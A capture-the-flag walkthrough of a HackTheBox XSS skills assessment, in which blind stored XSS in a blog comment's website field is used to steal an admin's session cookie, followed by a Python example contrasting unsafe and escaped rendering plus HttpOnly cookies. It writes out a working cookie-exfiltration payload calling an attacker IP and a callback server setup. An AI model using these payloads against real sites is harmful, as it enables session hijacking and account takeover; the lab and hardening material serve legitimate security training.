HackTheBox - Cross-Site Scripting (XSS) - Skills Assessment Walkthrough

Ido Abramov

Scenario

We are performing a web application penetration test for a company that hired us, which has just released its new Security Blog. In our test plan we have reached the part where we must test the web application against Cross-Site Scripting (XSS) vulnerabilities.

Our target is to use XSS for session hijacking to steal the victim’s cookie.

Walkthrough

First, we will enter the target website:

We will notice that there is only one blog post:

The site allows users to submit ideas and feedback, which will only be displayed after receiving admin approval.

Scroll down and you’ll see that we can write a comment. The input fields include comment, name, email and website. Let’s try it:

We can see our comment is waiting for approval:

Now, since we have a few fields that might be vulnerable to XSS injection, we need to find out which ones are actually vulnerable.

The variant we are dealing with here is Blind XSS: the injected content is rendered only in the admin's browser, so we cannot see the output or tell which payload executed. We therefore need an out-of-band signal that a payload has run. To get one, we will set up a server of our own and use XSS payloads that send a request to it when they execute in the admin's browser.

To do this, we'll set up a local server. Here, I will create a PHP server listening for incoming requests on port 81:

mkdir /tmp/tmpserver
cd /tmp/tmpserver
sudo php -S 0.0.0.0:81

The server is now listening for incoming requests.

Next, we will insert an XSS payload into each field. To tell the fields apart, each payload fetches a different URL of the form http://<SERVER_IP>:<PORT>/<FIELD_NAME>, so the path of the incoming request names the field that executed.

After we post the comment, the following request shows up on our server:

This means the website field is vulnerable to XSS injection.

Now that we have identified the field vulnerable to XSS, we can set a payload to steal the admin’s cookie.

We will use the following payload and insert it into the website field:

<script>new Image().src='http://10.10.14.242:81/?c='+document.cookie</script>

Then, we can see the following received on our server:

We successfully captured the admin’s cookie, and we can also see the flag 😉
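From the defending side, the finding above comes down to two missing controls: the website field is written into the admin's page without output encoding, and the session cookie is readable from JavaScript. The following is an added example, not code from the lab or the original walkthrough, that models the vulnerable rendering beside its hardened form and builds a Set-Cookie header that would keep document.cookie from exposing the session. The comment template, the field contents, CALLBACK_HOST and the PHPSESSID cookie name are all assumptions (the page does not show the blog's code or its cookie name).

```python
"""Added example: constructed model of the vulnerable comment rendering
and its hardened form (not the lab's own code)."""
import html
from http.cookies import SimpleCookie
from urllib.parse import urlsplit

# Constructed sample submission. The website field carries the same kind of
# payload the walkthrough planted; CALLBACK_HOST is a placeholder, not a real host.
SAMPLE_COMMENT = {
    "name": "tester <b>",
    "email": "tester@example.invalid",
    "website": "<script>new Image().src='http://CALLBACK_HOST:81/?c='+document.cookie</script>",
    "comment": "Nice post!",
}

# Assumed template for how the admin approval page shows a pending comment.
TEMPLATE = '<div class="comment"><a href="{website}">{name}</a><p>{comment}</p></div>'


def render_comment_unsafe(comment: dict) -> str:
    # Vulnerable model: user-controlled fields are interpolated verbatim, so
    # markup in any of them becomes part of the admin's page (stored XSS).
    return TEMPLATE.format(**comment)


def safe_website(value: str) -> str:
    # HTML-encoding alone does not make an href safe, because the browser will
    # follow whatever scheme the value carries. Keep only http(s) URLs.
    if urlsplit(value).scheme in ("http", "https"):
        return value
    return ""


def render_comment_safe(comment: dict) -> str:
    # Hardened form: restrict the URL field, then HTML-encode every field before
    # interpolation. quote=True also encodes ' and " so no value can break out
    # of the href attribute.
    fields = dict(comment)
    fields["website"] = safe_website(fields["website"])
    escaped = {k: html.escape(str(v), quote=True) for k, v in fields.items()}
    return TEMPLATE.format(**escaped)


def contains_script_tag(rendered: str) -> bool:
    # Crude check used only to show the difference between the two renderings.
    return "<script" in rendered.lower()


def session_cookie_header(session_id: str) -> str:
    # Second layer: mark the session cookie HttpOnly so document.cookie cannot
    # read it even if an injection slips through. PHPSESSID is assumed here as
    # the cookie name (PHP's default); the lab's real cookie name is not known.
    cookie = SimpleCookie()
    cookie["PHPSESSID"] = session_id
    cookie["PHPSESSID"]["httponly"] = True
    cookie["PHPSESSID"]["secure"] = True
    cookie["PHPSESSID"]["samesite"] = "Lax"
    return cookie.output(header="Set-Cookie:")


if __name__ == "__main__":
    print(render_comment_unsafe(SAMPLE_COMMENT))
    print(render_comment_safe(SAMPLE_COMMENT))
    print(session_cookie_header("constructed-session-id"))
```

The unsafe rendering emits the script element intact, which is exactly the condition the callback server detected; the safe rendering drops the non-http(s) "website" value and turns the remaining angle brackets into entities. The HttpOnly flag does not remove the XSS, but it takes the session cookie out of reach of document.cookie, so a payload like the one above would call home with an empty string.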
